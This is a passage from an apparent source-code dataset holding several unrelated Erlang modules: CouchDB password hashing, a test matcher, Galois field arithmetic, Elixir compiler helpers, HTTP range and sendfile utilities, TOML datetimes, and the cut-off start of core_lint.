% WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
% License for the specific language governing permissions and limitations under
% the License.
-module(couch_passwords).
-export([simple/2, pbkdf2/3, pbkdf2/4, verify/2]).
-include("couch_db.hrl").
-define(MAX_DERIVED_KEY_LENGTH, (1 bsl 32 - 1)).
-define(SHA1_OUTPUT_LENGTH, 20).
%% legacy scheme, not used for new passwords.
-spec simple(binary(), binary()) -> binary().
%% Hex-encoded SHA-1 of password ++ salt. Legacy scheme only.
%% NOTE(review): crypto:sha/1 is the pre-OTP-21 API (removed later in
%% favour of crypto:hash(sha, ...)) — this module targets old releases.
simple(Password, Salt) ->
    Digest = crypto:sha(<<Password/binary, Salt/binary>>),
    ?l2b(couch_util:to_hex(Digest)).
%% Current scheme, much stronger.
%% Derive a hex-encoded PBKDF2 key of the default (SHA-1) output length.
%%
%% Fix: the spec previously claimed string(), but pbkdf2/4 returns the
%% hex digest wrapped as {ok, binary()} (via ?l2b), so the unwrapped
%% result here is a binary.
-spec pbkdf2(binary(), binary(), integer()) -> binary().
pbkdf2(Password, Salt, Iterations) ->
    {ok, Result} = pbkdf2(Password, Salt, Iterations, ?SHA1_OUTPUT_LENGTH),
    Result.
-spec pbkdf2(binary(), binary(), integer(), integer())
    -> {ok, binary()} | {error, derived_key_too_long}.
pbkdf2(_Password, _Salt, _Iterations, DerivedLength)
        when DerivedLength > ?MAX_DERIVED_KEY_LENGTH ->
    {error, derived_key_too_long};
pbkdf2(Password, Salt, Iterations, DerivedLength) ->
    %% Derive ceil(DerivedLength / 20) SHA-1-sized blocks and keep the
    %% first DerivedLength bytes, hex-encoded.
    BlockCount = ceiling(DerivedLength / ?SHA1_OUTPUT_LENGTH),
    Blocks = iolist_to_binary(
               pbkdf2(Password, Salt, Iterations, BlockCount, 1, [])),
    <<DerivedKey:DerivedLength/binary, _/binary>> = Blocks,
    {ok, ?l2b(couch_util:to_hex(DerivedKey))}.
-spec pbkdf2(binary(), binary(), integer(), integer(), integer(), iolist())
    -> iolist().
%% Outer loop (RFC 2898 / PKCS #5): produce BlockCount T_i blocks,
%% accumulated in reverse and restored to order at the end.
pbkdf2(_Password, _Salt, _Iterations, BlockCount, BlockIndex, Acc)
    when BlockIndex > BlockCount ->
    lists:reverse(Acc);
pbkdf2(Password, Salt, Iterations, BlockCount, BlockIndex, Acc) ->
    Block = pbkdf2(Password, Salt, Iterations, BlockIndex, 1, <<>>, <<>>),
    pbkdf2(Password, Salt, Iterations, BlockCount, BlockIndex + 1, [Block|Acc]).
-spec pbkdf2(binary(), binary(), integer(), integer(), integer(),
    binary(), binary()) -> binary().
%% Inner loop: T_i = U_1 xor U_2 xor ... xor U_Iterations, with
%% U_1 = HMAC-SHA1(Password, Salt ++ <<BlockIndex:32>>) and
%% U_n = HMAC-SHA1(Password, U_{n-1}).
pbkdf2(_Password, _Salt, Iterations, _BlockIndex, Iteration, _Prev, Acc)
    when Iteration > Iterations ->
    Acc;
%% Iteration 1 seeds both the chaining value and the accumulator.
pbkdf2(Password, Salt, Iterations, BlockIndex, 1, _Prev, _Acc) ->
    InitialBlock = crypto:sha_mac(Password,
                                  <<Salt/binary,BlockIndex:32/integer>>),
    pbkdf2(Password, Salt, Iterations, BlockIndex, 2,
           InitialBlock, InitialBlock);
pbkdf2(Password, Salt, Iterations, BlockIndex, Iteration, Prev, Acc) ->
    Next = crypto:sha_mac(Password, Prev),
    pbkdf2(Password, Salt, Iterations, BlockIndex, Iteration + 1,
           Next, crypto:exor(Next, Acc)).
%% verify two lists for equality without short-circuits to avoid timing attacks.
%% The XOR of every character pair is OR-ed into the accumulator and only
%% inspected once both lists are exhausted, so the running time does not
%% depend on where the first mismatch occurs. Assumes equal lengths
%% (enforced by verify/2); unequal lengths crash with function_clause.
-spec verify(string(), string(), integer()) -> boolean().
verify([X|RestX], [Y|RestY], Result) ->
    verify(RestX, RestY, (X bxor Y) bor Result);
verify([], [], Result) ->
    Result == 0.
-spec verify(binary(), binary()) -> boolean();
            (list(), list()) -> boolean().
%% Equal-length inputs are compared in constant time by verify/3; a
%% length mismatch or unsupported/mixed types yield false immediately.
verify(X, Y) when is_binary(X), is_binary(Y) ->
    verify(?b2l(X), ?b2l(Y));
verify(X, Y) when is_list(X), is_list(Y) ->
    case length(X) =:= length(Y) of
        true -> verify(X, Y, 0);
        false -> false
    end;
verify(_X, _Y) ->
    false.
-spec ceiling(number()) -> integer().
%% Smallest integer greater than or equal to X.
ceiling(X) ->
    Truncated = erlang:trunc(X),
    case X > Truncated of
        true -> Truncated + 1;
        false -> Truncated
    end. | src/couchdb/couch_passwords.erl | 0.637482 | 0.430566 | couch_passwords.erl | starcoder |
% Licensed under the Apache License, Version 2.0 (the "License"); you may not
% use this file except in compliance with the License. You may obtain a copy of
% the License at
%
% http://www.apache.org/licenses/LICENSE-2.0
%
% Unless required by applicable law or agreed to in writing, software
% distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
% WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
% License for the specific language governing permissions and limitations under
% the License.
-module(porkrind).
-include("porkrind_internal.hrl").
-export([
check/2,
match/2,
describe/1,
reason/2
]).
%% Run Matcher against Value. Returns `ok' on success. A matcher failure
%% (signalled by match/2 as a porkrind_terminate throw carrying the
%% failing matcher and its reason) or any other exception is converted
%% into an {assertion_failed, Details} tuple.
%%
%% NOTE(review): erlang:get_stacktrace/0 was deprecated in OTP 21 and
%% removed in OTP 24; it must be called inside the catch clause, as done
%% here, to refer to the caught exception.
check(Value, Matcher) ->
    try match(Value, Matcher) of
        _ ->
            ok
    catch
        throw:{porkrind_terminate, {FailedMatcher, Reason}} ->
            {assertion_failed, [
                {stack, erlang:get_stacktrace()},
                {actual, Value},
                {expected, describe(FailedMatcher)},
                {reason, reason(FailedMatcher, Reason)}
            ]};
        Type:Reason ->
            %% Unexpected crash inside the matcher itself.
            {assertion_failed, [
                {stack, erlang:get_stacktrace()},
                {actual, Value},
                {expected, describe(Matcher)},
                {error, {Type, Reason}}
            ]}
    end.
%% Apply a matcher's match fun to Value; a porkrind_fail throw from the
%% fun is upgraded to porkrind_terminate, tagged with this matcher.
match(Value, Matcher) when ?IS_MATCHER(Matcher) ->
    #'porkrind.matcher'{match = MatchFun} = Matcher,
    try MatchFun(Value)
    catch
        throw:{porkrind_fail, Reason} ->
            throw({porkrind_terminate, {Matcher, Reason}})
    end.
%% Render a matcher (or plain term) as a flat human-readable string.
describe(Matcher) ->
    lists:flatten(describe_int(Matcher)).

%% Matchers render as "name(arg1, arg2, ...)"; tuples and lists keep
%% their natural delimiters; anything else is pretty-printed.
describe_int(Matcher) when ?IS_MATCHER(Matcher) ->
    #'porkrind.matcher'{name = Name, args = Args} = Matcher,
    case Args of
        undefined -> erlang:error({badarg, Matcher});
        _ -> ok
    end,
    ArgStrs = lists:map(fun describe_int/1, Args),
    io_lib:format("~s(~s)", [Name, string:join(ArgStrs, ", ")]);
describe_int(Tuple) when is_tuple(Tuple) ->
    Parts = lists:map(fun describe_int/1, tuple_to_list(Tuple)),
    porkrind_util:str_join(Parts, ", ", "{}");
describe_int(List) when is_list(List) ->
    Parts = lists:map(fun describe_int/1, List),
    porkrind_util:str_join(Parts, ", ", "[]");
describe_int(Term) ->
    io_lib:format("~120p", [Term]).
%% Render the failure reason through the matcher's reason callback; a
%% matcher without one is malformed and raises badmatcher.
reason(Matcher, Reason) when ?IS_MATCHER(Matcher) ->
    ReasonFun = Matcher#'porkrind.matcher'.reason,
    if ReasonFun /= undefined -> ok; true ->
        erlang:error({badmatcher, Matcher})
    end,
    lists:flatten(ReasonFun(Reason)). | src/porkrind.erl | 0.655777 | 0.485173 | porkrind.erl | starcoder |
%% From: https://github.com/rnewson/shamir/tree/master/src/galois.erl
%% Copyright 2011 <NAME>
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
-module(galois).
-export([generate/1, add/3, subtract/3, multiply/3, divide/3]).
-define(nw(W), (1 bsl W)).
-record(galois, {
w,
gflog,
gfilog
}).
%% Build the log/antilog tables for GF(2^W): repeatedly multiply the
%% generator by x (a left shift), reducing with the primitive polynomial
%% whenever the result overflows W bits. Stops after 2^W - 1 elements.
generate(W) ->
    generate(W, 1, 0).

generate(W, B, Log) ->
    generate(W, B, Log, dict:new(), dict:new()).

generate(W, _B, Log, Gflog, Gfilog) when Log =:= ?nw(W) - 1 ->
    #galois{w = W, gflog = Gflog, gfilog = Gfilog};
generate(W, B, Log, Gflog, Gfilog) ->
    Gflog1 = dict:store(B, Log, Gflog),
    Gfilog1 = dict:store(Log, B, Gfilog),
    Shifted = B bsl 1,
    NextB = case Shifted band ?nw(W) of
                0 -> Shifted;
                _ -> Shifted bxor prim_poly(W)
            end,
    generate(W, NextB, Log + 1, Gflog1, Gfilog1).
%% Multiply via log tables: a*b = antilog(log a + log b), wrapping the
%% sum back into [0, 2^w - 2].
multiply(#galois{}, 0, _) ->
    0;
multiply(#galois{}, _, 0) ->
    0;
multiply(#galois{w = W, gflog = Gflog, gfilog = Gfilog}, A, B) ->
    SumLog = dict:fetch(A, Gflog) + dict:fetch(B, Gflog),
    Index = case SumLog >= ?nw(W) - 1 of
                true -> SumLog - (?nw(W) - 1);
                false -> SumLog
            end,
    dict:fetch(Index, Gfilog).

%% Divide via log tables: a/b = antilog(log a - log b), wrapping the
%% difference back into [0, 2^w - 2]; division by zero throws.
divide(#galois{}, 0, _) ->
    0;
divide(#galois{}, _, 0) ->
    throw(division_by_zero);
divide(#galois{w = W, gflog = Gflog, gfilog = Gfilog}, A, B) ->
    DiffLog = dict:fetch(A, Gflog) - dict:fetch(B, Gflog),
    Index = case DiffLog < 0 of
                true -> DiffLog + (?nw(W) - 1);
                false -> DiffLog
            end,
    dict:fetch(Index, Gfilog).
%% In GF(2^w) both addition and subtraction are bitwise XOR.
add(#galois{}, A, B) ->
    A bxor B.
subtract(#galois{}, A, B) ->
    A bxor B.
%% Primitive polynomials (octal) used to reduce overflow during table
%% generation; these are the standard choices for w = 4, 8 and 16.
prim_poly(4) ->
    8#23;
prim_poly(8) ->
    8#435;
prim_poly(16) ->
    8#210013. | examples/crypto/galois.erl | 0.631822 | 0.486088 | galois.erl | starcoder |
-module(elixir_tree_helpers).
-export([abstract_syntax/1, build_bin/4, build_simple_bin/2, build_list/4, build_list/5,
build_method_call/4, build_simple_list/2,
build_var_name/2, convert_to_boolean/3]).
-include("elixir.hrl").
% Convert a literal Erlang term into its abstract-format (erl_parse)
% representation using syntax_tools.
abstract_syntax(Tree) ->
  erl_syntax:revert(erl_syntax:abstract(Tree)).
% Build a list transforming each expression and accumulating
% vars in one pass. It uses tail-recursive form.
%
% It receives a function to transform each expression given
% in Exprs, a Line used to build the List and the variables
% scope V is passed down item by item.
%
% The function needs to return a tuple where the first element
% is an erlang abstract form and the second is the new variables
% list.
build_list(Transform, Exprs, Line, S) ->
  build_list(Transform, Exprs, Line, S, {nil, Line}).

build_list(Transform, Exprs, Line, S, Tail) ->
  % Reverse first so the cons chain can be built onto Tail back-to-front.
  build_list_each(Transform, lists:reverse(Exprs), Line, S, Tail).

build_list_each(_Transform, [], _Line, Scope, Acc) ->
  { Acc, Scope };
build_list_each(Transform, [Expr0|Rest], Line, Scope, Acc) ->
  { Expr, Scope1 } = Transform(Expr0, Scope),
  build_list_each(Transform, Rest, Line, Scope1, { cons, Line, Expr, Acc }).
% Builds a simple list, without transformation, just by generating the cons-cell.
build_simple_list(Line, Args) ->
  % Identity transform: no variables are accumulated, hence the [] match.
  Identity = fun(Expr, Vars) -> {Expr, Vars} end,
  { List, [] } = build_list(Identity, Args, Line, []),
  List.
% Build a complex binary
% Fun transforms each expression and must return {Expr, NS, Format},
% where Format is the bit-syntax type specifier (or `default').
build_bin(Fun, Exprs, Line, S) ->
  build_bin_each(Fun, Exprs, Line, S, []).

build_bin_each(Fun, [], Line, S, Acc) ->
  % Elements were accumulated in reverse; restore source order.
  { { bin, Line, lists:reverse(Acc) }, S };
build_bin_each(Fun, [H|T], Line, S, Acc) ->
  { Expr, NS, Format } = Fun(H, S),
  case Expr of
    {string, _, String} ->
      % String literals expand to one integer bin_element per character,
      % all sharing the same Format. foldl prepends, so combined with the
      % final reverse the characters keep their original order.
      Final = lists:foldl(fun(Integer, FinalAcc) ->
        [{bin_element,Line,{integer,Line,Integer},default,Format}|FinalAcc]
      end, Acc, String),
      build_bin_each(Fun, T, Line, NS, Final);
    _ ->
      build_bin_each(Fun, T, Line, NS, [{ bin_element, Line, Expr, default, Format }|Acc])
  end.
% Build simple binaries
build_simple_bin(Line, Exprs) ->
  % No transformation; every element keeps the default type specifier.
  { Bin, [] } = build_bin(fun(X,Y) -> {X,Y,default} end, Exprs, Line, []),
  Bin.

% Build the abstract form of Name(Args) dispatched on Expr through the
% Elixir runtime dispatcher.
build_method_call(Name, Line, Args, Expr) ->
  FArgs = build_simple_list(Line, Args),
  ?ELIXIR_WRAP_CALL(Line, elixir_dispatch, dispatch, [Expr, {atom, Line, Name}, FArgs]).

% Builds a variable name.
% Generates a fresh compiler temporary ("X<counter>") and bumps the scope
% counter. Note that each fresh name creates a new atom.
build_var_name(Line, #elixir_scope{counter=Counter} = S) ->
  NS = S#elixir_scope{counter=Counter+1},
  Var = { var, Line, ?ELIXIR_ATOM_CONCAT(["X", Counter]) },
  { Var, NS }.
% Convert the given expression to a boolean value: true or false.
% Assumes the given expressions was already transformed.
convert_to_boolean(Line, Expr, Bool) ->
  % Elixir truthiness: only `false' and `nil' are falsy. With Bool = true
  % the built case yields Expr's truth value; with Bool = false it yields
  % the negation.
  Any = [{var, Line, '_'}],
  False = [{atom,Line,false}],
  Nil = [{atom,Line,nil}],
  FalseResult = [{atom,Line,not Bool}],
  TrueResult = [{atom,Line,Bool}],
  { 'case', Line, Expr, [
    { clause, Line, False, [], FalseResult },
    { clause, Line, Nil, [], FalseResult },
    { clause, Line, Any, [], TrueResult }
  ] }. | src/elixir_tree_helpers.erl | 0.537527 | 0.410284 | elixir_tree_helpers.erl | starcoder |
-module(wsUtil).
-include("wsCom.hrl").
-include_lib("kernel/include/file.hrl").
-export([
gLV/3
, mergeOpts/2
, normalizeRange/2
, encodeRange/2
, fileSize/1
, sendfile/5
]).
-export_type([range/0]).
%% Value stored under Key in a {Key, Value} list, or Default when absent.
gLV(Key, List, Default) ->
    case lists:keyfind(Key, 1, List) of
        {Key, Value} -> Value;
        false -> Default
    end.
-spec mergeOpts(Defaults :: list(), Options :: list()) -> list().
%% Overlay Options onto Defaults: {Key, Value} pairs replace any pair
%% with the same key; bare flags are added with duplicates removed.
mergeOpts(Defaults, Options) ->
    Merge =
        fun({Name, _} = Pair, Acc) ->
                lists:keystore(Name, 1, Acc, Pair);
           (Flag, Acc) ->
                lists:usort([Flag | Acc])
        end,
    lists:foldl(Merge, Defaults, Options).
-type range() :: {Offset :: non_neg_integer(), Length :: non_neg_integer()}.
-spec normalizeRange(RangeOrSet, Size) -> Normalized when
RangeOrSet :: any(),
Size :: integer(),
Normalized :: range() | undefined | invalid_range.
%% @doc: If a valid byte-range, or byte-range-set of size 1
%% is supplied, returns a normalized range in the format
%% {Offset, Length}. Returns undefined when an empty byte-range-set
%% is supplied and the atom `invalid_range' in all other cases.
%% Normalize the supported byte-range shapes to {Offset, Length}; an
%% empty byte-range-set maps to `undefined', anything else to
%% `invalid_range'.
normalizeRange({suffix, Length}, Size) when is_integer(Length), Length > 0 ->
    Take = erlang:min(Length, Size),
    {Size - Take, Take};
normalizeRange({offset, Offset}, Size)
        when is_integer(Offset), Offset >= 0, Offset < Size ->
    {Offset, Size - Offset};
normalizeRange({bytes, First, Last}, Size)
        when is_integer(First), is_integer(Last), First =< Last ->
    %% Inclusive byte range; convert to {Offset, Length}.
    normalizeRange({First, Last - First + 1}, Size);
normalizeRange({Offset, Length}, Size)
        when is_integer(Offset), is_integer(Length),
             Offset >= 0, Length >= 0, Offset < Size ->
    {Offset, erlang:min(Length, Size - Offset)};
normalizeRange([ByteRange], Size) ->
    %% A byte-range-set with exactly one element.
    normalizeRange(ByteRange, Size);
normalizeRange([], _Size) ->
    undefined;
normalizeRange(_, _Size) ->
    invalid_range.
-spec encodeRange(Range :: range() | invalid_range, Size :: non_neg_integer()) -> ByteRange :: iolist().
%% @doc: Encode Range to a Content-Range value.
encodeRange(Range, Size) ->
    Total = integer_to_binary(Size),
    [<<"bytes ">>, encodeRangeBytes(Range), <<"/">>, Total].

%% "First-Last" for a valid range, "*" for an unsatisfiable one.
encodeRangeBytes(invalid_range) ->
    <<"*">>;
encodeRangeBytes({Offset, Length}) ->
    Last = Offset + Length - 1,
    [integer_to_binary(Offset), <<"-">>, integer_to_binary(Last)].
-spec fileSize(Filename :: file:name_all()) -> Size :: non_neg_integer() | {error, Reason :: file:posix() | badarg | invalid_file}.
%% @doc: Size in bytes of a readable regular file; {error, _} otherwise.
fileSize(Filename) ->
    case file:read_file_info(Filename) of
        {ok, #file_info{type = regular, access = Access, size = Size}}
                when Access =:= read; Access =:= read_write ->
            Size;
        {error, _} = Error ->
            Error;
        _ ->
            %% Exists but is not a readable regular file.
            {error, invalid_file}
    end.
%% @doc Send part of a file on a socket.
%%
%% Basically, @see file:sendfile/5 but for ssl (i.e. not raw OS sockets).
%% Originally from https://github.com/ninenines/ranch/pull/41/files
%%
%% NOTE(review): the loop below always sends via ssl:send/2, so the
%% inet:socket() alternative in the spec looks unsupported — confirm.
%%
%% @end
-spec sendfile(file:fd(), inet:socket() | ssl:sslsocket(), non_neg_integer(), non_neg_integer(), sendfile_opts()) -> {ok, non_neg_integer()} | {error, atom()}.
sendfile(RawFile, Socket, Offset, Bytes, Opts) ->
    ChunkSize = chunkSize(Opts),
    %% Remember where the descriptor currently points so it can be
    %% restored after a successful send; if it already sits at Offset
    %% (first clause: Offset is bound), no extra seek is needed.
    Initial2 =
        case file:position(RawFile, {cur, 0}) of
            {ok, Offset} ->
                Offset;
            {ok, Initial} ->
                {ok, _} = file:position(RawFile, {bof, Offset}),
                Initial
        end,
    case sendfileLoop(Socket, RawFile, Bytes, 0, ChunkSize) of
        {ok, _Sent} = Result ->
            %% Restore the saved position before returning.
            {ok, _} = file:position(RawFile, {bof, Initial2}),
            Result;
        {error, _Reason} = Error ->
            Error
    end.
-spec chunkSize(sendfile_opts()) -> pos_integer().
%% Chunk size for the send loop; absence of the option, or an explicit 0,
%% selects the 16#1FFF (8191-byte) default. Other invalid values crash.
chunkSize(Opts) ->
    Default = 16#1FFF,
    case lists:keyfind(chunk_size, 1, Opts) of
        {chunk_size, Size} when is_integer(Size) andalso Size > 0 ->
            Size;
        {chunk_size, 0} ->
            Default;
        false ->
            Default
    end.
-spec sendfileLoop(inet:socket() | ssl:sslsocket(), file:fd(), non_neg_integer(), non_neg_integer(), pos_integer()) -> {ok, non_neg_integer()} | {error, term()}.
%% Read the file chunk by chunk and push each chunk with ssl:send/2.
%% Bytes = 0 means "send until EOF" (the Sent =/= 0 guard below keeps
%% that case from terminating immediately).
sendfileLoop(_Socket, _RawFile, Sent, Sent, _ChunkSize) when Sent =/= 0 ->
    %% All requested data has been read and sent, return number of bytes sent.
    {ok, Sent};
sendfileLoop(Socket, RawFile, Bytes, Sent, ChunkSize) ->
    ReadSize = read_size(Bytes, Sent, ChunkSize),
    case file:read(RawFile, ReadSize) of
        {ok, IoData} ->
            case ssl:send(Socket, IoData) of
                ok ->
                    Sent2 = iolist_size(IoData) + Sent,
                    sendfileLoop(Socket, RawFile, Bytes, Sent2, ChunkSize);
                {error, _Reason} = Error ->
                    Error
            end;
        eof ->
            %% End of file reached before the byte count; report what
            %% was actually sent.
            {ok, Sent};
        {error, _Reason} = Error ->
            Error
    end.
-spec read_size(non_neg_integer(), non_neg_integer(), non_neg_integer()) -> non_neg_integer().
%% Bytes to read next: Bytes = 0 means "until EOF", so always a full
%% chunk; otherwise never read past the requested byte count.
read_size(0, _Sent, ChunkSize) ->
    ChunkSize;
read_size(Bytes, Sent, ChunkSize) ->
    min(Bytes - Sent, ChunkSize). | src/wsSrv/wsUtil.erl | 0.606964 | 0.438966 | wsUtil.erl | starcoder |
-module(tomerl_datetime).
-ignore_xref([
format/1,
millisecond/1,
offset/1,
to_calendar/1,
type/1
]).
-export([
new_time/3,
new_time/4,
new_date/3,
new_datetime/2,
with_offset/2,
to_calendar/1,
millisecond/1,
offset/1,
type/1,
format/1
]).
-type year() :: 1000..9999.
-type month() :: 1..12.
-type day() :: 1..31.
-type hour() :: 0..23.
-type minute() :: 0..59.
-type second() :: 0..60.
-type millisecond() :: 0..999.
-type offset() :: z | integer().
% Timezone offset in minutes or `z'
-record(date, {
year :: year(),
month :: month(),
day :: day()
}).
-record(time, {
hour :: hour(),
minute :: minute(),
second :: second()
}).
-record(time_ms, {
hour :: hour(),
minute :: minute(),
second :: second(),
millisecond :: millisecond()
}).
-record(datetime, {
date :: date(),
time :: time()
}).
-record(datetime_offset, {
date :: date(),
time :: time(),
offset :: offset()
}).
-opaque date() :: #date{}.
-opaque time() :: #time{} | #time_ms{}.
-opaque datetime() :: #datetime{}.
-opaque datetime_offset() :: #datetime_offset{}.
-type t() :: date() | time() | datetime() | datetime_offset().
-export_type([
date/0,
time/0,
datetime/0,
datetime_offset/0,
year/0,
month/0,
day/0,
hour/0,
minute/0,
second/0,
millisecond/0,
offset/0,
t/0
]).
-spec new_time(hour(), minute(), second()) -> time().
%% Time of day with whole-second precision.
new_time(H, M, S) ->
    #time{hour = H, minute = M, second = S}.
-spec new_time(hour(), minute(), second(), millisecond()) -> time().
%% Time of day with millisecond precision.
new_time(H, M, S, Ms) ->
    #time_ms{hour = H, minute = M, second = S, millisecond = Ms}.
-spec new_date(year(), month(), day()) -> date().
%% Calendar date.
new_date(Y, M, D) ->
    #date{year = Y, month = M, day = D}.
-spec new_datetime(date(), time()) -> datetime().
%% Date + time without timezone information ("local" datetime).
new_datetime(Date, Time) ->
    #datetime{date = Date, time = Time}.
-spec new_datetime(date(), time(), offset()) -> datetime_offset().
%% Date + time with a timezone offset (minutes, or `z' for UTC).
new_datetime(Date, Time, Offset) ->
    #datetime_offset{date = Date, time = Time, offset = Offset}.
-spec with_offset(datetime(), offset()) -> datetime_offset().
%% Attach a timezone offset to an offset-less datetime.
with_offset(#datetime{date = Date, time = Time}, Offset) ->
    new_datetime(Date, Time, Offset).
-spec type(_) -> time | date | datetime | datetime_offset | undefined.
%% Tag naming which kind of temporal value a term is, or `undefined' for
%% anything that is not one of this module's records.
type(#time{}) -> time;
type(#time_ms{}) -> time;
type(#date{}) -> date;
type(#datetime{}) -> datetime;
type(#datetime_offset{}) -> datetime_offset;
type(_) -> undefined.
%% @doc Convert a tomerl date, time, or datetime object to the format used by
%% Erlang's calendar module, dropping the timezone offset and millisecond
%% information
-spec to_calendar
    (time()) -> calendar:time();
    (date()) -> calendar:date();
    (datetime()) -> calendar:datetime();
    (datetime_offset()) -> calendar:datetime().
to_calendar(#time{hour = H, minute = M, second = S}) ->
    {H, M, S};
to_calendar(#time_ms{hour = H, minute = M, second = S}) ->
    %% Millisecond precision is intentionally dropped here.
    {H, M, S};
to_calendar(#date{year = Y, month = M, day = D}) ->
    {Y, M, D};
to_calendar(#datetime{date = Date, time = Time}) ->
    {to_calendar(Date), to_calendar(Time)};
to_calendar(#datetime_offset{date = Date, time = Time}) ->
    %% The offset is intentionally dropped here.
    {to_calendar(Date), to_calendar(Time)}.
%% @doc Get the timezone offset of a datetime
%% Returns `z', an integer number of minutes, or `undefined' for a
%% datetime that carries no offset.
-spec offset
    (datetime_offset()) -> offset();
    (datetime()) -> undefined.
offset(#datetime_offset{offset = Offset}) ->
    Offset;
offset(#datetime{}) ->
    undefined.
%% @doc Get the millisecond information of an object
%% Times without millisecond precision report 0.
-spec millisecond(datetime() | datetime_offset() | time()) -> millisecond().
millisecond(#datetime{time = Time}) ->
    millisecond(Time);
millisecond(#datetime_offset{time = Time}) ->
    millisecond(Time);
millisecond(#time{}) ->
    0;
millisecond(#time_ms{millisecond = Ms}) ->
    Ms.
%% @doc Format the date, time, or datetime in ISO8601 format
format(#time{hour = H, minute = M, second = S}) ->
    io_lib:format("~2..0B:~2..0B:~2..0B", [H, M, S]);
format(#time_ms{hour = H, minute = M, second = S, millisecond = Ms}) ->
    io_lib:format("~2..0B:~2..0B:~2..0B.~3..0B", [H, M, S, Ms]);
format(#date{year = Y, month = M, day = D}) ->
    io_lib:format("~4..0B-~2..0B-~2..0B", [Y, M, D]);
format(#datetime{date = Date, time = Time}) ->
    [format(Date), $T, format(Time)];
format(#datetime_offset{date = Date, time = Time, offset = z}) ->
    [format(Date), $T, format(Time), $Z];
format(#datetime_offset{date = Date, time = Time, offset = Offset}) ->
    %% Numeric offsets render as +HH:MM / -HH:MM.
    Sign =
        if
            Offset < 0 -> $-;
            true -> $+
        end,
    Offset1 = abs(Offset),
    Minutes = Offset1 rem 60,
    Hours = Offset1 div 60,
    Formatted = io_lib:format("~2..0B:~2..0B", [Hours, Minutes]),
    [format(Date), $T, format(Time), Sign, Formatted]. | src/tomerl_datetime.erl | 0.652352 | 0.424531 | tomerl_datetime.erl | starcoder |
%%
%% %CopyrightBegin%
%%
%% Copyright Ericsson AB 1999-2018. All Rights Reserved.
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%
%% %CopyrightEnd%
%%
%% Purpose : Do necessary checking of Core Erlang code.
%% Check Core module for errors. Seeing this module is used in the
%% compiler after optimisations we do more checking than would be
%% necessary after just parsing. Don't check all constructs.
%%
%% We check the following:
%%
%% All referred functions, called and exported, are defined.
%% Format of export list.
%% Format of attributes
%% Used variables are defined.
%% Variables in let and funs.
%% Patterns case clauses.
%% Values only as multiple values/variables/patterns.
%% Return same number of values as requested
%% Correct number of arguments
%% Consistency of values/variables
%% Consistency of function return values/calls.
%%
%% We keep the names defined variables and functions in a ordered list
%% of variable names and function name/arity pairs.
-module(core_lint).
-export([module/1,module/2,format_error/1]).
-import(lists, [reverse/1,all/2,foldl/3]).
-import(ordsets, [add_element/2,is_element/2,union/2]).
-include("core_parse.hrl").
%%-----------------------------------------------------------------------
%% Types used in this module
-type fa() :: {atom(), arity()}.
-type err_desc() :: 'invalid_attributes' | 'invalid_exports'
| {'arg_mismatch', fa()}
| {'illegal_expr', fa()} | {'illegal_guard', fa()}
| {'illegal_try', fa()}
| {'not_bs_pattern', fa()} | {'not_pattern', fa()}
| {'not_var', fa()} | {'pattern_mismatch', fa()}
| {'return_mismatch', fa()} | {'undefined_function', fa()}
| {'duplicate_var', cerl:var_name(), fa()}
| {'unbound_var', cerl:var_name(), fa()}
| {'undefined_function', fa(), fa()}
| {'tail_segment_not_at_end', fa()}.
-type error() :: {'none', module(), err_desc()}.
-type warning() :: {module(), term()}.
%%-----------------------------------------------------------------------
%% Define the lint state record.
-record(lint, {module :: module(), % Current module
func :: fa() | 'undefined', % Current function
errors = [] :: [error()], % Errors
warnings= [] :: [warning()]}). % Warnings
%%----------------------------------------------------------------------
%% format_error(Error)
%% Return a string describing the error.
-spec format_error(err_desc()) -> [char() | list()].

%% Human-readable message for each error descriptor. Core Erlang carries
%% no line numbers, so messages identify the offending function instead.
format_error(invalid_attributes) -> "invalid attributes";
format_error(invalid_exports) -> "invalid exports";
format_error({arg_mismatch,{F,A}}) ->
    io_lib:format("argument count mismatch in ~w/~w", [F,A]);
format_error({illegal_expr,{F,A}}) ->
    io_lib:format("illegal expression in ~w/~w", [F,A]);
format_error({illegal_guard,{F,A}}) ->
    io_lib:format("illegal guard expression in ~w/~w", [F,A]);
format_error({illegal_try,{F,A}}) ->
    io_lib:format("illegal try expression in ~w/~w", [F,A]);
format_error({not_bs_pattern,{F,A}}) ->
    io_lib:format("expecting bit syntax pattern in ~w/~w", [F,A]);
format_error({not_pattern,{F,A}}) ->
    io_lib:format("expecting pattern in ~w/~w", [F,A]);
format_error({not_var,{F,A}}) ->
    io_lib:format("expecting variable in ~w/~w", [F,A]);
format_error({pattern_mismatch,{F,A}}) ->
    io_lib:format("pattern count mismatch in ~w/~w", [F,A]);
format_error({return_mismatch,{F,A}}) ->
    io_lib:format("return count mismatch in ~w/~w", [F,A]);
format_error({undefined_function,{F,A}}) ->
    io_lib:format("function ~w/~w undefined", [F,A]);
format_error({duplicate_var,N,{F,A}}) ->
    io_lib:format("duplicate variable ~p in ~w/~w", [N,F,A]);
format_error({unbound_var,N,{F,A}}) ->
    io_lib:format("unbound variable ~p in ~w/~w", [N,F,A]);
format_error({undefined_function,{F1,A1},{F2,A2}}) ->
    io_lib:format("undefined function ~w/~w in ~w/~w", [F1,A1,F2,A2]);
format_error({tail_segment_not_at_end,{F,A}}) ->
    io_lib:format("binary tail segment not at end in ~w/~w", [F,A]).
-type ret() :: {'ok', [{module(), [warning(),...]}]}
| {'error', [{module(), [error(),...]}],
[{module(), [warning(),...]}]}.
-spec module(cerl:c_module()) -> ret().

module(M) -> module(M, []).

-spec module(cerl:c_module(), [compile:option()]) -> ret().

